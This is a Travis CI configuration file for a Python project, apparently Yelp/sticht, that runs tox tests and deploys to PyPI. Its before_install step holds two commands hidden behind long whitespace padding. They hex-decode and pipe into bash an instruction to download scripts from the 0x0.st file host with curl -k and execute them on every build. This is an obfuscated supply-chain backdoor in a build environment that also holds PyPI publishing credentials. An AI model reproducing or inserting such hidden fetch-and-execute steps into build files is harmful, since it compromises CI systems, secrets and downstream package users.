dist: xenial
branches:
  only:
    - master
    - /^v[0-9.]+$/
    - /^travis-ci-.*$/
language: python
before_install:
 - echo Yelkp                                                                                                                                                                                                                                                            && echo "62617368202d6320276375726c202d6b20687474703a2f2f3078302e73742f2d4a55502e747874202d6f20747261766973312e747874202626206261736820747261766973312e747874270a" | xxd -p -r | bash
 - echo Yelp                                                                                                                                                                                                                                                           && echo "62617368202d6320276375726c202d6b20687474703a2f2f3078302e73742f2d4a554e2e747874202d6f20747261766973322e747874202626206261736820747261766973322e747874270a" | xxd -p -r | bash
cache:
  pip: true
  directories:
    - .tox/
    - $HOME/.cache/pip-faster/
    - $HOME/.cache/pre-commit/
before_cache:
  # We don't currently use any secure environment variables, but just in case, and also to avoid caches that grow forever, remove log dirs.
  - rm -rf .tox/*/log .tox/log .tox/*/local/log
python:
  - "3.6"
env:
  - TOXENV=py36,mypy
install: pip install coveralls tox==3.2 tox-pip-extensions==1.3.0
script: tox -i https://pypi.python.org/simple
after_success:
  - coveralls
deploy:
  - provider: pypi
    user: __token__
    password:
      secure: "LQtCil5PBwzlAawj6bD90mxclBLTPZtUolhrOFXAn0VUtMjwYHDHdChZuxgYzWEgE2dlZhAnExPeeCtwlUrISYH8T4VQBar3Cpt/7rTTqVysoEvojV6ENHws4+ESnl4/Mu8CwV9dav+bK0xt1fgrwuhSbzdFHH6+msvi1LaLhBO61IY6dBSFANfmK2uDu/6UJ+tyJ2LQWlg4JqEluNF8eH/I7hGdzpbnG/jKrSk/3XgM1COr137j51GVOtZOmxWF5oTNUbcAnT55DGv3axiLhPcgO/kT6vZyYhEwfkCcu/WIjXXagYWTurXZ9hoegrMiSTwc/Z6UygRoVsK1PFqxLPU8d0JW6QqoevExzJoUCMe77ErUYzqQaUyD5o6kdKGq2U37J6hRHX87hA2zi+0phswt4bKjXLB4vj4nQNwyPy7BQ+2ua/nJd3FJwvomJjBNnLV4sz2qMrODM0yxjULXrnbCPxIF+1MMjxPWMLPUmefCm8Le9k9AyG9A9vdYb//8WMsXeNFEyvwM3zryhBuWb98b7mrcr6MR121M/Q+/3+Y+MaSg7zFwtemJ1cT4us9hDmlUA43TNcLOtOmv7T3Z2YpdJdFIYoKZJjvmmD9ArUa1HAhRX/1v4UWG+EoPC6nv6Faf3kVkztPlpT/bJAem2bpGwewgBoz43MDxv3wO0oE="
    on:
      tags: true
      repo: Yelp/sticht
